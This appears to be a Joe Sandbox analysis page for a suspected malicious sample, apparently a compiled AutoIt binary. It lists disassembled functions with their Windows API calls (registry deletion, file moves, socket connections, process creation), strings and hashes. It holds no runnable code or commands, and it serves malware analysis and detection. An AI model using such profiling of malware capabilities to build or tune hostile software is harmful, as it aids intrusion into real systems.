API String ID: 2945705084-0
Opcode ID: e323a1c0835ca24538203384ad122820b913bd50d2ad215dc94480531ed9e016
Instruction ID: 8535b5b911666926bdfa0947689cbfa78690b00546b10fdcaa45a79352ef6fe0
Opcode Fuzzy Hash: e323a1c0835ca24538203384ad122820b913bd50d2ad215dc94480531ed9e016
Instruction Fuzzy Hash: 35419065C1061476CB51FBF48886ACFB3BADF04310F50896AF509E3221FB34A795C7AA

Function 0067D56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0067D5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0067D60A
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0067D61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0067D69D

Strings

,,k, xrefs: 0067D578
DllGetClassObject, xrefs: 0067D610

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: ,,k$DllGetClassObject
API String ID: 753597075-913296791
Opcode ID: 53d9b035e2fee833f621f9d1650e55a3a0bf4519afd13469ba44ee347e0c35c1
Instruction ID: 50e195248313518907e73ea6b9b57e9758db63305605e38e3f0c94f2bf925154
Opcode Fuzzy Hash: 53d9b035e2fee833f621f9d1650e55a3a0bf4519afd13469ba44ee347e0c35c1
Instruction Fuzzy Hash: 7F416BB1600204EFDB15DF64C884A9ABBBAEF85314F1589ADED0D9F205D7B1DD44CBA0

Function 00683671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0068466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00683697,?), ref: 0068468B

Part of subcall function 0068466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00683697,?), ref: 006846A4

lstrcmpiW.KERNEL32(?,?), ref: 006836B7
_wcscmp.LIBCMT ref: 006836D3
MoveFileW.KERNEL32(?,?), ref: 006836EB
_wcscat.LIBCMT ref: 00683733
SHFileOperationW.SHELL32(?), ref: 0068379F

Strings

\*.*, xrefs: 0068372D

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 91ac1c8a346511d5dbc482a228d2b5a1c40565e000e0deec677353c45c6652cf
Instruction ID: 9f057983693d810b4434c9fe5462c5b5dd70fd420ecabd3c19ad80e7057b83e1
Opcode Fuzzy Hash: 91ac1c8a346511d5dbc482a228d2b5a1c40565e000e0deec677353c45c6652cf
Instruction Fuzzy Hash: 6741B171508345AEC795FF64C441ADFB7E9EF89740F000A2EF49AC3251EA34D689CB5A

Function 006A7291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006A72AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006A7351
IsMenu.USER32(?), ref: 006A7369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006A73B1
DrawMenuBar.USER32 ref: 006A73C4

Strings

0, xrefs: 006A729E

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 1ef317f5a22627461e33c5d747450aa036285e036ea2901b9331ef2ed6664f5e
Instruction ID: 521ad939028b149c593abf3e03a777e51ac6af47e93d31638fd0e9f1ee3285b8
Opcode Fuzzy Hash: 1ef317f5a22627461e33c5d747450aa036285e036ea2901b9331ef2ed6664f5e
Instruction Fuzzy Hash: 35412275A00208AFDF20EF90D884AAABBEAEF0A315F159429FD05AB250D730AD14DF50

Function 006A0FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 006A0FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006A0FFE
FreeLibrary.KERNEL32(00000000), ref: 006A10B5

Part of subcall function 006A0FA5: RegCloseKey.ADVAPI32(?), ref: 006A101B
Part of subcall function 006A0FA5: FreeLibrary.KERNEL32(?), ref: 006A106D
Part of subcall function 006A0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 006A1090

RegDeleteKeyW.ADVAPI32(?,?), ref: 006A1058

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 8eb802f412f3ac4dbf3b78095fd1a04e8064be768a3b223283a4e71f7b75c798
Instruction ID: b578683819a43612c39ec21064c3325f00651502cf733fdc39b653c5dd018938
Opcode Fuzzy Hash: 8eb802f412f3ac4dbf3b78095fd1a04e8064be768a3b223283a4e71f7b75c798
Instruction Fuzzy Hash: 87312F71900109BFEB15AF90DC89EFFB7BDEF0A300F000169E501E6241DA746E859EA5

Function 006A62CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 006A62EC
GetWindowLongW.USER32(016754E0,000000F0), ref: 006A631F
GetWindowLongW.USER32(016754E0,000000F0), ref: 006A6354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 006A6386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 006A63B0
GetWindowLongW.USER32(00000000,000000F0), ref: 006A63C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 006A63DB

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 5d113b94918ac03ecc7ebb2a460f24d3e46904bb9cbccfc11362563f30369c19
Instruction ID: 203aff8eec79933ef509914d1ef277fadb9c6cb8f1e3c0a3df3225f7b567af8e
Opcode Fuzzy Hash: 5d113b94918ac03ecc7ebb2a460f24d3e46904bb9cbccfc11362563f30369c19
Instruction Fuzzy Hash: 2531FF34640290EFDB20AF58DC84F9637E2FB4A714F1961A8F5518F2B2CB61AC419F51

Function 0067DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0067DB2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0067DB54
SysAllocString.OLEAUT32(00000000), ref: 0067DB57
SysAllocString.OLEAUT32(?), ref: 0067DB75
SysFreeString.OLEAUT32(?), ref: 0067DB7E
StringFromGUID2.OLE32(?,?,00000028), ref: 0067DBA3
SysAllocString.OLEAUT32(?), ref: 0067DBB1

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 6b2da03f6fd1b64a9c75595786b118bc855541989442dc65a7d0481abb29b51c
Instruction ID: 3aa30b2f5a7d8b57757b3115d45e7f64e2f9b97901b771bd788c5dc79f68f139
Opcode Fuzzy Hash: 6b2da03f6fd1b64a9c75595786b118bc855541989442dc65a7d0481abb29b51c
Instruction Fuzzy Hash: B8217176600219AFDB10AFB8DC84CBB73AEEF09760B018525F918DB291D670AC418B64

Function 00696173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00697D8B: inet_addr.WSOCK32(00000000), ref: 00697DB6

socket.WSOCK32(00000002,00000001,00000006), ref: 006961C6
WSAGetLastError.WSOCK32(00000000), ref: 006961D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0069620E
connect.WSOCK32(00000000,?,00000010), ref: 00696217
WSAGetLastError.WSOCK32 ref: 00696221
closesocket.WSOCK32(00000000), ref: 0069624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00696263

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 34e708f5cd573531c51d8f4f4370fb0fd0921db307012fd682a7c3d50fe0b3fc
Instruction ID: 1bb082412936253514ae1bb2964184567a53876f86718f66581417e1b6f3ab5b
Opcode Fuzzy Hash: 34e708f5cd573531c51d8f4f4370fb0fd0921db307012fd682a7c3d50fe0b3fc
Instruction Fuzzy Hash: 4831AF31600218AFEF10AF64DC85BBE7BAEEF45760F044029F905A7291DB74AD048BA2

Function 0067F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0067F671
__wcsnicmp.LIBCMT ref: 0067F692
__wcsnicmp.LIBCMT ref: 0067F6AC

Strings

#OnAutoItStartRegister, xrefs: 0067F6A6
#requireadmin, xrefs: 0067F68C
#notrayicon, xrefs: 0067F669

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: be4fa0116843194fb10a3d79280d7cc6df5d5c4ea5b433aa5b40795b7256ddf1
Instruction ID: b54719dcb0c3059a9a84b7c81941033badd86ae7b09992faf7259d51bf50835c
Opcode Fuzzy Hash: be4fa0116843194fb10a3d79280d7cc6df5d5c4ea5b433aa5b40795b7256ddf1
Instruction Fuzzy Hash: 0721497221452266D324A734FC12EE773DBDF55340F10C03DF98987291EB919D82D399

Function 0067DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0067DC09
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0067DC2F
SysAllocString.OLEAUT32(00000000), ref: 0067DC32
SysAllocString.OLEAUT32 ref: 0067DC53
SysFreeString.OLEAUT32 ref: 0067DC5C
StringFromGUID2.OLE32(?,?,00000028), ref: 0067DC76
SysAllocString.OLEAUT32(?), ref: 0067DC84

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 489806a4f982f644f45c6c7afb45d84666d12514e598e0d64f0df1a2bfd96cb3
Instruction ID: 24365e95b24fb5e2a740e792b06e539344ab2e0b79060e41d4bcd8e195d59539
Opcode Fuzzy Hash: 489806a4f982f644f45c6c7afb45d84666d12514e598e0d64f0df1a2bfd96cb3
Instruction Fuzzy Hash: BA213075604214AF9B10ABF8DC88DAB77FEEF09360B10C525F919CB261DAB4EC41CB65

Function 006A75CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00621D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00621D73
Part of subcall function 00621D35: GetStockObject.GDI32(00000011), ref: 00621D87
Part of subcall function 00621D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00621D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 006A7632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 006A763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 006A764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 006A7659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 006A7665

Strings

Msctls_Progress32, xrefs: 006A7603

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 1fe49cfc8fdebba832ce247e1bd971d1521ba000d46ef84e71390d0c01ffa31f
Instruction ID: bd553e0a85f657973b164fe7e18070dee225b170ad4d4c25d94383f21ed6f13a
Opcode Fuzzy Hash: 1fe49cfc8fdebba832ce247e1bd971d1521ba000d46ef84e71390d0c01ffa31f
Instruction Fuzzy Hash: DE11C4B2110219BFEF119F64CC85EE77F6EEF09798F015115BA04A61A0CB72AC21DFA4

Function 00649AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00649AE6

Part of subcall function 00643187: EncodePointer.KERNEL32(00000000), ref: 0064318A
Part of subcall function 00643187: __initp_misc_winsig.LIBCMT ref: 006431A5
Part of subcall function 00643187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00649EA0
Part of subcall function 00643187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00649EB4
Part of subcall function 00643187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00649EC7
Part of subcall function 00643187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00649EDA
Part of subcall function 00643187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00649EED
Part of subcall function 00643187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00649F00
Part of subcall function 00643187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00649F13
Part of subcall function 00643187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00649F26
Part of subcall function 00643187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00649F39
Part of subcall function 00643187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00649F4C
Part of subcall function 00643187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00649F5F
Part of subcall function 00643187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00649F72
Part of subcall function 00643187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00649F85
Part of subcall function 00643187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00649F98
Part of subcall function 00643187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00649FAB
Part of subcall function 00643187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00649FBE

__mtinitlocks.LIBCMT ref: 00649AEB
__mtterm.LIBCMT ref: 00649AF4

Part of subcall function 00649B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00649AF9,00647CD0,006DA0B8,00000014), ref: 00649C56
Part of subcall function 00649B5C: _free.LIBCMT ref: 00649C5D
Part of subcall function 00649B5C: DeleteCriticalSection.KERNEL32(02n,?,?,00649AF9,00647CD0,006DA0B8,00000014), ref: 00649C7F

__calloc_crt.LIBCMT ref: 00649B19
__initptd.LIBCMT ref: 00649B3B
GetCurrentThreadId.KERNEL32 ref: 00649B42

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: fa59d3e6969e5a3e6631f39723e2e4f86206903847f1be49fd43e935df06f30b
Instruction ID: ec3e05c5008202a141ea4cca7ff3cfe3a0ec1d1bd92a80a7b345806fbf125798
Opcode Fuzzy Hash: fa59d3e6969e5a3e6631f39723e2e4f86206903847f1be49fd43e935df06f30b
Instruction Fuzzy Hash: 1AF06232A8A71159E7B47774BC0368B2697DF02738B200A1EF4608A1D2EE11944145B8

Function 006AB635 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006AB644
_memset.LIBCMT ref: 006AB653
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,006E6F20,006E6F64), ref: 006AB682
CloseHandle.KERNEL32 ref: 006AB694

Strings

on, xrefs: 006AB63E
don, xrefs: 006AB64D

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID: on$don
API String ID: 3277943733-2777740003
Opcode ID: ae7a0aa3b6285606dc78c93c109b765990da514d75442d025db3de4213f1092a
Instruction ID: 837f2ee9467244b0c51adc4bdae626ddead7332086a097b823e611c7ba7a4510
Opcode Fuzzy Hash: ae7a0aa3b6285606dc78c93c109b765990da514d75442d025db3de4213f1092a
Instruction Fuzzy Hash: E1F05EB25403807AE7102B61FC46FBB7A9FEB193D5F006020FA08EA192D7715C008BA9

Function 0064406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00643F85), ref: 00644085
GetProcAddress.KERNEL32(00000000), ref: 0064408C
EncodePointer.KERNEL32(00000000), ref: 00644097
DecodePointer.KERNEL32(00643F85), ref: 006440B2

Strings

RoUninitialize, xrefs: 00644074
combase.dll, xrefs: 00644080

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 916b2735653e19e82b9ee8d8ffee7af52a22e5ccb3e39ee0ba86097ea55d6211
Instruction ID: 3fe56b4b529b6bd72cb1c2dc39cbb5dc7c5b08c93d98b5b6976e16667b0b9342
Opcode Fuzzy Hash: 916b2735653e19e82b9ee8d8ffee7af52a22e5ccb3e39ee0ba86097ea55d6211
Instruction Fuzzy Hash: 42E09A70541351AFDB10BFA2EC4DB857AA7BB15742F106428F101E66A0CB7656449F15

Function 006864B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0068660B
_memmove.LIBCMT ref: 00686546

Part of subcall function 00629837: __itow.LIBCMT ref: 00629862
Part of subcall function 00629837: __swprintf.LIBCMT ref: 006298AC

_memmove.LIBCMT ref: 006865B9
_memmove.LIBCMT ref: 006866A0
_memmove.LIBCMT ref: 006866B9
_memmove.LIBCMT ref: 006866D5

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 9863102e03c29a5e0e466ba8f1401a9340df7fcea8e799d8c2f609bfb2f3a253
Instruction ID: 23611d59c02445d69d6d524a2bf37a6e328c1d525c5bb74883ee2f800525c921
Opcode Fuzzy Hash: 9863102e03c29a5e0e466ba8f1401a9340df7fcea8e799d8c2f609bfb2f3a253
Instruction Fuzzy Hash: 9161AD309006AA9BDF41FF60CC81EFE37A6AF45308F04461DF9156B292EB349D56CB69

Function 006A01E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00627DE1: _memmove.LIBCMT ref: 00627E22

Part of subcall function 006A0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0069FDAD,?,?), ref: 006A0E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006A02BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006A02FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 006A0320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 006A0349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 006A038C
RegCloseKey.ADVAPI32(00000000), ref: 006A0399

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
